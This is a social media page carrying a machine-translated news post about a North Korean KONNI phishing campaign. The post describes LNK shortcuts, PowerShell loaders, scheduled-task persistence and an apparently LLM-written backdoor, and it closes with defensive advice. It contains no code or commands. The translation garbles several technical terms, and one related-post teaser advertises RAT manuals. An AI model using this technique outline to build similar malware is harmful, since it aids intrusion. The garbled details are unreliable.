Lemon8Lifestyle community

Automatically translated.View original post

FreedomHack 󱢏
FreedomHack 󱢏

3850 followers

Follow
Follow
Follow
A group of hackers from North Korea, KONNI, used malware. 's images(0)
1/2

You may also like

Tools and sites I use as a cybersecurity student 🌸

Tools and sites I use as a cybersecurity student 🌸

LexiStudiesLexiStudies
103
Websites You NEED to Pass Your College Courses

Websites You NEED to Pass Your College Courses

BeautyBeauty
274
Do you like hackers?

Do you like hackers?

Lil ConsciousLil Conscious
38
SIEGEX is all CHEATERS & HACKERS😭

SIEGEX is all CHEATERS & HACKERS😭

PhasmaPhasma
28
Your to-do list just got a personal manager

Your to-do list just got a personal manager

RevereliaReverelia
361
See more on the app
See more on the app
See more on the app
0 saved
1

A group of hackers from North Korea, KONNI, used malware.

A group of hackers from North Korea, KONNI, used Backdoor malware written in AI to attack the victim.

If it comes to a nation that is not a great power, but has some of the best hackers in the world, it can't escape a small country like North Korea that can be hit every day by hacking and malware. With the latest work from this news, many people will be worried again.

According to a report by the website Security Affair, it discusses the detection of a new campaign of hackers from North Korea, KONNI, also known as Kimsuky, Earth Imp, TA406, Thallium, Vedalia, and Velvet Chollima, which is a victim fraud campaign with Phishing, focusing its victims on a group of software developers (Developers) in the Asia-Pacific area, or APAC, using a fake project document file purporting to be a new project involving blockchain technology, and Krypto Kerrenzi C to trick victims into downloading. The area of the malware epidemic is unknown. South Korea, a longtime antagonist of North Korea, gradually spread to other countries such as Japan, Australia and India.

As for the embedding of the malware on the machine, sources have explained that it will start with a group of hackers sending a link to the victim, claiming that it is a new project that requires the victim to participate. The link is a link of a file deposited on the system of the Discord chat network. When the victim presses the link, it will download a zip file that, when the file is broken, two files will appear. One is a PDF file for distracting the victim (Decoy) and an Internet Shortcut file of the LNK genus that has the illusion of naming a file similar to a file of the genus. DOCX. If the victim presses to open the file, it will lead to a PowerShell script running on the file to decompress two files. The first will be a real .DOCX file with the same name as Shortcut in most respects (but a phantom document), and the other will be a compressed CAB file with a malware file (Payload). These two are encoded to the LNK file with an XOR encryption method using a single-byte key.

After that, the script within the CAB file creates a malware persistence on the system by creating a task scheduling table and naming the task as the normal operation of the OneDrive system. Then, it runs malware for opening the back door of the system (Backdoor) in the form of a PowerShell script that can confuse the Obfuscation. This part will run directly on memory, making it difficult to detect.

And the key part is in the Backdoor, which came in the PowerShell script format, where a research team from Check Point, a cyberdefense specialist company that detects such malware, said that by examining the code, there are many points to believe that it was written with the use of AI or Artificial Intelligence in the large language model (LLM or Large Language Model). Whether it is Verbose Documentation, Modular Layout Design, and Computer Instructional Comments, such as "Your permanent project UUID," all indicate that they are created by LLM AI. And the research team also said that compared to malware and other attack methods, it can be patched up to the conclusion that the KONNI group is behind the malware and this campaign, based on the use of LNK files and malware that are unique to this group of hackers.

In addition to the remarkable fact that this malware is AI-generated, it also has many different capabilities - Sandbox Evasion, Anti-Analysis, Verification of Malware Users as Permitted Users (Interaction Validation), and Single Instance Enforcement via Global Mutex. Not only does it have a Fingerprint Host key to control the C2 server or Command and Control tracking (Tracking) according to the privilege level of the victim's system, The ability to emanate UAC Account Control (User Account Control) with Windows Defender, Remote Monitoring and Management software to create Persistence. Hackers can log in to the victim at any time, including copying JavaScript Challenges to emanate the web browser's protection system. This allows the reception of commands and smuggling of files to C2 servers.

# Trending # Lemon 8 Howtoo # lemon 8 diary # freedomhack # it

2/14 Edited to

... Read moreจากประสบการณ์ส่วนตัวในการติดตามข่าวภัยไซเบอร์ พบว่า กลุ่มแฮกเกอร์ KONNI จากเกาหลีเหนือใช้เทคโนโลยีขั้นสูงอย่าง AI ในการสร้างมัลแวร์ Backdoor ที่มีความซับซ้อนและยากต่อการตรวจจับ การที่มัลแวร์ตัวนี้ใช้สคริปต์ PowerShell พร้อมการเข้ารหัส XOR แบบไบต์เดียวและจัดวางเป็นโมดูลต่าง ๆ แสดงถึงแนวทางใหม่ในการโจมตีที่เน้นประสิทธิภาพและการเลี่ยงระบบป้องกันแบบ Sandbox รวมถึงระบบตรวจจับอื่น ๆ อีกด้วย นอกจากนี้ การทำ Persistence ผ่าน Task Scheduling ที่ตั้งชื่อคล้ายกับระบบปกติ เช่น OneDrive ช่วยให้มัลแวร์สามารถฝังตัวอยู่ในระบบต่อเนื่องได้อย่างแนบเนียน และการใช้ฟีเจอร์ต่าง ๆ เช่น User-Interaction Validation, Global Mutex และ Fingerprint Host เป็นการยกระดับความปลอดภัยของมัลแวร์ให้สามารถควบคุมเครื่องเป้าหมายได้อย่างสมบูรณ์และยากต่อการยุติ สำหรับผู้ใช้งานทั่วไปหรือโปรแกรมเมอร์ การระมัดระวังการดาวน์โหลดไฟล์จากแหล่งที่ไม่น่าเชื่อถือเป็นเรื่องสำคัญ โดยเฉพาะลิงก์ที่ได้รับจากแพลตฟอร์มแชทอย่าง Discord ที่อาจถูกใช้เป็นช่องทางแพร่มัลแวร์ นอกจากนี้ การอัปเดตซอฟต์แวร์และระบบปฏิบัติการเป็นประจำ รวมถึงการใช้ซอฟต์แวร์ป้องกันไวรัสที่มีความสามารถในการตรวจจับมัลแวร์ที่มีเทคนิค Obfuscation จะช่วยลดความเสี่ยงได้มาก สุดท้าย ขอแนะนำให้ติดตามข่าวสารด้านความปลอดภัยไซเบอร์จากแหล่งข้อมูลที่เชื่อถือได้และแบ่งปันข้อมูลกับเพื่อนร่วมงานในวงการ IT หรือ Developer เพื่อเพิ่มความตระหนักรู้ และร่วมกันป้องกันภัยในวงกว้างได้ดียิ่งขึ้น

Related posts

A young woman with long dark hair, wearing a pink satin shirt, smiles at the camera while sitting at a table. Overlay text reads: 'Tools and sites I use as a cybersecurity student to progress my skills and keep me interested in studying'.
A screenshot of 'The Hacker News' website, displaying various cybersecurity news articles from January 2025, including topics like vulnerabilities, malware, cyber espionage, and AI jailbreak methods. An ad for Zscaler and a banner for CIS Hardened Images are also visible.
A screenshot of the O'Reilly learning platform, showing various books and expert playlists related to AI, engineering, and data. Overlay text highlights the subscription cost ($50/month or $499/year) and its value for accessing books and live events.
Tools and sites I use as a cybersecurity student 🌸
#cybersecuritystudent #cybersecurity #techgirlie
LexiStudies

LexiStudies

103 likes

A laptop with a cloudy sky wallpaper and a white cup with a red logo. Text overlay reads: 'Free Websites That Saved My GPA AND MY SANITY Sharing So You Don't Struggle Too'.
A laptop screen displays Yahoo search results for 'Quizlet'. An overlay describes Quizlet as a free flashcard tool for memorizing terms, definitions, and formulas, making studying feel like a game.
A laptop screen displays Yahoo search results for 'Unriddle.ai'. An overlay describes Unriddle.ai as a free tool that breaks down notes, articles, or assignments to aid understanding of long readings.
Websites You NEED to Pass Your College Courses
Y’all college is hard enough without trying to figure everything out on your own 😩 So here’s my list of websites that actually helped me pass my classes like, these were in my survival kit. I’m not gatekeeping 🫶🏽 Quizlet When I needed to memorize terms FAST. I used it for flashcards, and the matc
Beauty

Beauty

274 likes

Do you like hackers?
#hacker #hackers #tricked #fyp
Lil Conscious

Lil Conscious

38 likes

SIEGEX is all CHEATERS & HACKERS😭
Why is this game full of cheaters and hackers and bugs🤷‍♀️ #siege #rainbowsixsiege #gaming #streamer #foryou
Phasma

Phasma

28 likes

A monitor displays the Martin AI assistant dashboard with sections for to-dos, reminders, calendar, and chat, set on a desk with a keyboard and plant, illustrating the phrase "Say what you need, it gets it done."
The Martin AI assistant dashboard is shown, featuring to-dos, reminders, calendar, inbox, and a chat interface for sending schedules, emphasizing its ability to use voice commands for tasks like texting and setting reminders.
The Martin AI assistant dashboard displays to-dos, reminders, calendar, and an inbox with emails, highlighting its function to remember and track information across various platforms without repetition.
Your to-do list just got a personal manager
You know when you have too many tabs open in your brain? This app is like closing all of them... at once. Martin is your Al assistant that actually works like a real one. Need to text someone, forward notes, set reminders, or manage your day? Just tell Martin. It connects with your inbox,
Reverelia

Reverelia

361 likes

The image shows a keyboard with a fingerprint icon, overlaid with "OUTSMART HACKERS" and "Secrets they don't want you to know," serving as the title for a guide on cybersecurity.
This image explains hackers use software to guess passwords and advises creating long passwords with a random mix of letters, numbers, and symbols to defend against such attacks.
The image warns that hackers try common passwords and advises users to defend themselves by avoiding easy words/phrases and not reusing passwords across different sites.
SECRETS Hackers DON’T Want You to Know!
After hackers got into my Facebook account and completely erased it, I dusted myself off and started a deep dive to understand why and how hackers work. The best way to protect yourself is to outsmart them. Here are 5 secrets Hackers DON'T want you to know! Share this with everyone! #lemon8pa
techgirljen

techgirljen

424 likes

I wanted a real project I could actually show, not just talk about. So I used Atoms ⚛️ Check it out here: https://tinyurl.com/3xzc8xbe It feels like having a whole AI team helping me: 🔍 they do the deep research first 🏁 then Race Mode builds different versions so I can compare 👥 I just pick
emilie.studygram

emilie.studygram

19 likes

How Hackers Could Crash 20 Million Devices! #podcast #hacker #hack #fyp
ShawRyanClips

ShawRyanClips

2 likes

Kalebdavis19

Kalebdavis19

0 likes

BIG Holiday Costco Shop & Haul | Anchorage, Alaska
vanditsv

vanditsv

2 likes

Hackers
How call of duty has me #call of duty #hacker #warzone
Stevie_Wonders

Stevie_Wonders

1 like

4 In demand Certificates You Need in 2025
Hey Career Girl, I know you want to start off the New Year on the right foot and a certificate is just the thing. Certificates can open the doors to new pathways in the career world that wouldn't have been opened before! Love this type of content? Follow and share! Need Interview P
Lauren|Career Girl

Lauren|Career Girl

164 likes

🧠 Would YOU plug in a random USB? Jamie did… and almost let hackers into his system. ⚠️ This comic shows a real cybersecurity trick: USB Baiting — where attackers drop infected drives hoping someone connects them. 👀 Learn what a Trojan is 🔐 Discover how to spot dangerous files 💬 Drop a 🛑
CyberSnack

CyberSnack

1 like

Poor Belle ! #beauty & the beast salt shackers
Like why did they have to paint her face like that 😂😂🤣🤣 #new #beauty #beautyandthebeast #disney #salt #pepper #homegoods #finds #fyp #fypシ #trending #shop #shopping #shopwithme #fypage #explore #explorepage #reels #eleydencreations #content #contentcreator #creator
EleydenCreation

EleydenCreation

651 likes

scammers and hackers beware
Hudson
cercofhell

cercofhell

28 likes

Most small businesses believe they’re too small to be hacked… but that’s not how cyber risk works. In today’s connected world, your business doesn’t stand alone. You rely on vendors, payroll systems, cloud platforms, CRMs, IT providers, to run your operations. But here’s the truth many people ov
Abby❤️💎

Abby❤️💎

0 likes

A phone screen displays eSIM settings, showing an active AT&T eSIM with a phone number, an option to add a new eSIM, and primary SIM settings.
The title of an article, 'What Can Someone Do With Your SIM Card? (How To Secure It)', published on February 8, 2024, with author details.
Text discussing the risks of a stolen SIM card, including an example of $68,000 stolen via a SIM swap, and noting the rise in SIM card attacks.
my physical sim card from my original AT&T smartphone has been stolen out of my Samsung Galaxy Fold7
Dougintime

Dougintime

4 likes

Ban Hackers
Heel to Heel Flick #fcmobile #eafcmobile #fifamobile #fcmobile25 #eafc
manuelofficial_13

manuelofficial_13

0 likes

Bigfoot Super Hackers.
#manthoughts #hackers #laughoutloud #bigfootvlog #lifetips
Alien Hayes

Alien Hayes

11 likes

PSA PSA PSA ‼️ #fyp #hackers #facebook #scammers #viral
Kay’s House ✨

Kay’s House ✨

0 likes

Ban Hackers
Vinicius Jr 🇧🇷 #fcmobile #eafcmobile #fifamobile #fcmobile25 #eafc
manuelofficial_13

manuelofficial_13

1 like

A smartphone displays a message asking God to unblock it due to hackers. A patterned pad and colorful items are in the hazy background. The image includes Lemon8 branding and a username.
God, please unblock this android, hackers have in
Olga Ledbetter

Olga Ledbetter

37 likes

Just An FYI This Is How So Many People are Getting Hacked!!! Plz Don’t Fall For Message Like These!!! it’s A Fake Account!!! #fakeaccount #hackers
MaryBell

MaryBell

2 likes

Hackers hijacked antivirus features to install mal
Hackers hijacked antivirus features to install malware - here's what we know https://www.yahoo.com/tech/cybersecurity/articles/hackers-hijacked-antivirus-features-install-140500891.html #hackers #malware #cybersecurity #antivirus
angela1957

angela1957

1 like

WARNING TO 2.5B GMAIL USERS. Hackers are continuing to target you. Here’s what to do Follow @cybersecuritygirl for more tips #google #gmail #tips #news #techtips
Cybersecurity Girl

Cybersecurity Girl

496 likes

Prayers for Jamaica 🇯🇲 — opening Hacker’s Slumber,
Cousin B

Cousin B

0 likes

Which of these video games would you play?
Hkohles1gaming

Hkohles1gaming

1 like

Look world Elon Musk and Donald Trump and Mark Zuckerberg and Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers just locked and removed my lives for no reason cause I'm speaking my freedom of speech constitutional rights and laws FBI and state police DEA and governme
glentrump359

glentrump359

0 likes

Don’t trust everything you get through an email or text. #tiktokshop #hacks #hackers #tiktokshopaffiliate #fyp
NiaRose

NiaRose

0 likes

Don’t Use Airport USB Chargers!
TSA is now advising NOT to use Airport USB Chargers. Bring your own USB charging bricks. "Hackers can install malware at USB ports (we’ve been told that’s called 'juice/port jacking'). So, when you’re at an airport do not plug your phone directly into a USB port. Bring your TSA-compl
Destination & Travel Junkies

Destination & Travel Junkies

151 likes

just enough to make the stop count
the pricing was still about the same as my home town though
boxed.in.2026

boxed.in.2026

0 likes

A message to Minecraft hackers…
You should join the server #minecraft #gaming #fyp
BendersMC

BendersMC

13 likes

Look world Elon Musk and Donald Trump and Mark Zuckerberg and Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers just locked and removed my lives for no reason cause I'm speaking my freedom of speech constitutional rights and laws FBI and state police DEA and governme
glentrump359

glentrump359

0 likes

Look world Elon Musk and Donald Trump and Mark Zuckerberg and Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers just locked and removed my lives for no reason cause I'm speaking my freedom of speech constitutional rights and laws FBI and state police DEA and governme
glentrump359

glentrump359

0 likes

Look world Elon Musk and Donald Trump and Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers still harassing me on all my social media apps showing favoritism and discriminate against Glen Nickolas Akins cause I'm listening to music
glentrump359

glentrump359

1 like

Look world removed my posts again on Lemon8 app right now I just posted a minute ago these meth heads going crazy frfr they need some serious help on God Jesus Christ Look world on Lemon8 app right now removing my freedom of speech constitutional rights and laws Elon Musk and Donald Trump and Mark
glentrump359

glentrump359

0 likes

Ban Hackers
😃 #fcmobile #eafcmobile #fifamobile #fcmobile25 #eafc
manuelofficial_13

manuelofficial_13

4 likes

A Fortnite character in a victory pose with a "Victory Royale" banner, overlaid with text "How I Improved My Fortnite Skills" and a "SWIPEZ" arrow, indicating the start of a guide.
Two Fortnite gameplay screenshots comparing graphics settings. The top shows high settings (Shadows ON, View Distance FAR), while the bottom shows low settings (Shadows OFF, View Distance NEAR) for improved visibility.
A Fortnite UI displaying accolades like "TWO TO ONE ODDS" for winning a Duos match solo, and "ONE MAN'S TREASURE" for using legendary weapons, alongside a first-person view of gameplay.
How I Improved My Fortnite Skills In 1 Season
Adjust Your Settings This is optional, your settings may already be perfect for your devices and your gameplay style. However, certain things in the game or your system can sometimes impact your gameplay. Fortnite takes a lot of processing power, so if you can relieve some of the load by adjusting
🌻ChromaGlitch

🌻ChromaGlitch

311 likes

A 3D animated female character in a brown layered outfit, standing in a room. An overlay text expresses concern about the app having hackers and scammers.
A 3D animated female character with long brown hair, wearing a dark top with patterned sleeves and a layered skirt, looking over her shoulder.
A 3D animated female character in a lime green crop top and blue sarong, standing against a yellow tiled background. Text overlay mentions 'Momabear's set of Cuteness Overdose'.
Omg 😱 this app is becoming a bunch of hackers and
This app related to tik tok, why yall making it as a bunch of hackers and scammers WTH 🤦‍♀️ go somewhere else with your nonsense
ruthiyalvarez

ruthiyalvarez

2 likes

SEPT WRAP UP PT 1.
september had me in a CHOKEHOLD y'all 😮‍💨 i read so much i have to break this into TWO PARTS 😂😂 • 47 books read (don't play with me •) • 19 new authors • multiple favorites that little binge had me blowing right past my 200 book goal, so you know i had to bump it up to 250 from messy d
LEXI 💓

LEXI 💓

32 likes

Amen thanks Father God Jesus Christ God morning word and prayer devil's I rebuke you your childrens Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers and Elon Musk and Donald Trump and Mark Zuckerberg and Randy Tappin and Christopher Thirdkill and IT and their countr
glentrump359

glentrump359

0 likes

hackers everywhere
#fortinite #fyp
Outro-7

Outro-7

0 likes

King Trump
GrouchyGrandpaChannel

GrouchyGrandpaChannel

4 likes

This table makes my space feel bigger than it is—because it works harder than any piece of furniture I own 🛋️🪄 #AnywaysWood #spacehackers #tinyhomeideas #cleverfurniture #hometricks
Amy

Amy

0 likes

HACKERS IN THE BETA
Blackops 7 has hackers already…. #hacker #blackops7 #bo7
Goofstha

Goofstha

1 like

FBI and state police DEA and government judicial and president Donald Trump go down there to collinston Louisiana right now and get Morehouse parish sheriff department officers and Mike Stone Tubbs KKK and Randy Tappin and Christopher Thirdkill and IT and all the rest of Morehouse parish sheriff de
glentrump359

glentrump359

0 likes

Hackers Dream
🕶 Digital Survival Duo "What if the real threat wasn’t in the email… but hidden in the vacation photo you just opened?" Remote Access Terminal (R.A.T.) and Image Hunter are not theory — they’re step-by-step, copy-paste-ready manuals with real, verifiable code. Learn exactly how attackers
Dark Meta

Dark Meta

9 likes

We Hear So Much but See So Little…
Why ppl always talk about the Epstein files like they are some hidden treasure of truth. Names. Proof. Everything. But years keep passing and nothing real comes out. Just rumors and arguing online. It makes me wonder if the files are locked away deeper than we think. Or if powerful people have
heyynick

heyynick

67 likes

A screen displays a prompt for "Glen Akins Jr." to confirm humanity to use their account, with a blue "Continue" button. This suggests an account verification step on a social media platform.
Look world just locked my Facebook account cause I was. Sharing my video Look world these meth going to crazy again the 7th time February 16,2026 on my bingo app right now harassing me cause I'm listening to the video of court day Morehouse parish sheriff department officers and Mike Stone Tubb
glentrump359

glentrump359

2 likes

Amen thanks Father God Jesus Christ God morning word and prayer devil's I rebuke you your childrens Morehouse parish sheriff department officers and Mike Stone Tubbs and hackers and Elon Musk and Donald Trump and Mark Zuckerberg and Randy Tappin and Christopher Thirdkill and IT and their countr
glentrump359

glentrump359

1 like

See more